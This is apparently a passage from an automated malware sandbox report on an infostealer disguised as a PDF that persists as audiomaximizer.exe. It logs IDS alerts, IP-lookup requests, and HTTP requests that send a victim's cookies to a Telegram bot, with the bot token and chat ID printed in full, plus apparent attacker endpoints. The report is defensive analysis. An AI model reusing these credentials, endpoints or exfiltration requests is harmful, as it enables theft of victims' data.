            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED24B0h8_2_06ED21B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED5480h8_2_06ED5188
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED6C68h8_2_06ED6970
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED9C38h8_2_06ED9940
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED8450h8_2_06ED8158

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49760 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49778 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49773 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49777 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd348fc5d06ecdHost: api.telegram.orgContent-Length: 7046
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34928e143909Host: api.telegram.orgContent-Length: 7046
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 104.21.32.1:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49752 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd348fc5d06ecdHost: api.telegram.orgContent-Length: 7046
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 11:08:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 11:08:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: svchost.exe, 00000004.00000002.3334847823.0000023633000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 00000004.00000003.1707895013.0000023633218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000004.00000003.1707895013.0000023633218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000004.00000003.1707895013.0000023633218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000004.00000003.1707895013.000002363324D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
